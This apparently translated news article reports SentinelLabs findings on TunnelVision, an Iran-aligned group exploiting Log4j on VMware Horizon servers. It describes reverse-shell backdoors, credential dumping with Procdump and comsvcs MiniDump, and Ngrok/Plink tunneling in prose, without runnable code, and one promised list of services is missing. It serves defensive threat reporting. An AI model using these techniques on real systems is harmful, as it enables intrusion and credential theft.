An Iran-aligned hacking group followed as TunnelVision was spotted exploiting Log4j on VMware Horizon servers to breach corporate networks in the Middle East and the United States.
SentinelLabs security analysts who tracked the activity chose the name because of the group’s heavy reliance on tunneling tools, which help them hide their activities from detection solutions.
Tunneling is the process of routing data traffic in such a way that its transmission becomes obscured or even masked.
TunnelVision’s ultimate goal appears to be the deployment of ransomware, so the group isn’t just focused on cyber espionage, but also data destruction and operational disruption.
TunnelVision previously targeted CVE-2018-13379 (Fortinet FortiOS), a set of Microsoft Exchange ProxyShell vulnerabilities, and has now turned to the Log4Shell exploit.
The target deployments are VMware Horizon servers that are vulnerable to easy-to-exploit Log4j vulnerabilities.
The exploit process is the same as detailed by the NHS in a January 2022 security bulletin, which involves directly executing PowerShell commands and enabling reverse shells through the Tomcat service.
PowerShell commands help adversaries retrieve outputs using a webhook, while all connections use one of the following legitimate services:
SentinelLabs observed TunnelVision launching two reverse-shell custom backdoors on compromised machines.
The first payload is a zip file that contains an executable named “InteropServices.exe”, which contains an obfuscated reverse shell that says “microsoft-updateserver[.]see.”
The second payload, which has been used primarily by threat actors in recent attacks, is a modified version of a one-line PowerShell available on GitHub.
TunnelVision relies on this second backdoor to perform the following actions:
- Execute recognition commands.
- Create backdoor users and add them to the administrators group.
- Collects credentials using Procdump, SAM hive dumps, and comsvcs MiniDump.
- Download and run tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.
- Execution of a reverse shell using the VMware Horizon NodeJS component.
- Perform RDP scans on the internal subnet using a publicly available port scan script.
A separate cluster
While TunnelVision has similarities and overlaps with other Iranian hacking groups, SentinelLabs attributes the activity to a separate and distinct cluster.
“TunnelVision’s activities have already been discussed and are tracked by other vendors under various names, such as Phosphorus (Microsoft) and, confusingly, Charming Kitten or Nemesis Kitten (CrowdStrike),” the SentinelLabs report explains. .
“This confusion arises because the business that Microsoft recognizes as one group, ‘Phosphorous’, overlaps with the business that CrowdStrike distinguishes as belonging to two different players, Charming Kitten and Nemesis Kitten.”
As the analysts conclude, the possibility of a relationship between these groups cannot be ruled out, but there is insufficient evidence that points to links at this time.